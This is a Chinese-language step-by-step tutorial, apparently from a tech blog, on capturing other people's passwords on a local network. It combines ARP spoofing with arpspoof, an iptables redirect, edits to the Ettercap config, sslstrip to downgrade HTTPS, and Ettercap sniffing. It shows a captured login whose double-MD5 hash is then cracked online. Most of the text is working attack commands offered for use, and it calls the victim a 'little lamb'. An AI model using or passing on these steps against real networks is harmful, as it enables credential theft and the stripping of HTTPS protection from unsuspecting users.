使用sslstrip环境配合ettercap进行arp劫持抓密码
(适用HTTPS和HTTP页面)
arp劫持测试局限
1.浏览器使用安全性较低的ie
2.有的https页面防护做的好可能出现页面不显示,或者密码抓不到
目标者ip:192.168.1.160
攻击者ip:192.168.1.162
一.开启IP转发(开启IP转发的目的是为了能够开启ARP劫持)
(1)利用ip_forward检查ip转发状态:
代码语言:javascript复制cat /proc/sys/net/ipv4/ip_forward
状态为0,说明ip转发关闭
(2)开启ip转发:
代码语言:javascript复制echo 1 >> /proc/sys/net/ipv4/ip_forward
(3)再次检查ip转发状态:
显示状态为1,表示已经成功开启ip转发!
二.使用ARPspoof工具进行ARPspoof欺骗攻击(arpspoof工具的作用是将目标的流量流向攻击者的计算机中)
(1)下面是利用ARP毒化,重定向受害者的流量传送给攻击者。(将攻击者插入目标与网关之间)
首先将目标机(192.168.1.160)的流量与网关(192.168.1.1)建立arp欺骗:
流量会一直跑,开着不动它
(2)其次是将攻击者(192.168.1.162)与网关(192.168.1.1)建立ARP欺骗:
代码语言:javascript复制arpspoof -i eth0 -t 192.168.1.1 192.168.1.162
设置好该项也不关闭它,让它一直跑着流量。
建立好着两个ARP欺骗,ARP欺骗的部分就设置好了。
三.使用iptables(linux下ip信息包过滤系统)设置防止网页出现报错。(这是为了让攻击更加悄无声息)
(1)使用iptables设置防止网页报错:
代码语言:javascript复制iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
设置完成 -t:指定操作表;-p:指定协议;--destination-port:目标端口;-j:跳(可加载扩展)
四.设置嗅探(抓包)工具Ettercap的配置文件etter.conf内容。(ettercap工具只有在配置完毕后才可使用)
(1)修改etter.conf文件配置:vim /etc/ettercap/etter.conf
回车
点击E(表示编辑文档)
点击Shift :(表示输入命令)
输入set number(表示显示文档行数)
将16行改为ec_uid=0
将17行改为ec_gid=0
将178行redir之前的#去掉
将179行redir之前的#也去掉
再点击Shift :(表示输入命令)
wq!
回车
这样嗅探工具Ettercap下etter.conf文档的配置就完成了,接下来就可以启用Ettercap对目标进行嗅探抓包了
五.开启sslstrip工具(sslstrip是将https变为http)
(1)开启sslstrip工具,将https页面变为可利用的http页面:sslstrip –a –f –k
六.开启Ettercap嗅探模式,当目标有操作时可对目标进行抓包(抓取目标登录信息)
(1)开启ettercap进行抓包:ettercap
抓包模式已经开启
七.目标(我们的小绵羊)浏览https登录界面时(XXX为例)
(1)目标浏览XXX网
代码语言:javascript复制账号:sssss
密码:sssss
(2)接下来我们看ettercap中抓到的结果
捕获:
代码语言:javascript复制账号:sssss
密码:65a6a04c7194d24e4be9dd9c716c379983df97a004916099b60b443097959d28
密码是双md5加密的
(3)解密md5密码(登录在线MD5解密网站)
代码语言:javascript复制解除账号的密码为:sssss